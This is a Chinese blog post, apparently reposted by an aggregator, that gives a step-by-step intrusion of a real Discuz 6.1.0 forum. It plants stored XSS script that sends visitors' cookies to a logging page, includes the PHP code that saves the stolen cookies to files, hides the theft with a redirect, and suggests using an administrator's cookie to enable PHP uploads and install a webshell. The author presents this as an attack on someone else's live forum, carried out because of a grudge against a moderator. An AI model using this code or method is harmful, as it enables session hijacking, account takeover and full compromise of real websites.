xss漏洞php注射实战,利用XSS渗透DISCUZ 6.1.0实战
論壇——>入侵者布置的跨站攻擊——>轉移被入侵這視線(隱蔽)
論壇插入腳本:
var img = new Image();
img.src = 'get_cookie.php?var=' + encodeURI(document.cookie);
但是我不一樣,因為他需要誘導人去點擊他的鏈接,但是現在人不是傻子,不會輕易點你的鏈接。而我是要把腳步插入論壇頁面中,這樣既隱蔽又省去了誘導的力氣
我插入的腳本如下:
**********************************************************************************************
**********************************************************************************************
跨站攻擊腳本:
reg.php
************************************************************************************
if (isset($_GET['var'])) {
file_put_contents('./cookie/'.time().'.txt', urldecode($_GET['var']));
}
?>
//轉移頁面隱蔽上面記錄cookie的操作
************************************************************************************
剩下的步驟就是等著魚自己上鉤了
當管理員帳號點入論壇某個頁面時,這個頁面卻被轉到了某新聞網站,其實不知,他的cookie已經被記錄
拿這個cookie登錄論壇,(刪東西不推薦哦~~),可以臨時開啟上傳php文件,例如phpwebshell,然后再關閉,這樣你就可以很輕松的操控整個論壇站點
為什么選擇此論壇做入侵講解,很簡單,這個論壇具備了多個漏洞:
一、論壇有XSS漏洞,沒有對輸入輸出做過濾
二、論壇采用cookie方式記錄用戶信息
三、對論壇上某個版主看不慣,有點權利亂封號,不過,畢竟論壇不是那個人的,還是對管理員手下留情吧(做人要厚道!)
總結
以上是生活随笔為你收集整理的xss漏洞php注射实战,利用XSS渗透DISCUZ 6.1.0实战的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 电动车锂电池电芯鼓包能修复吗?
- 下一篇: 动态规划算法php,php算法学习之动态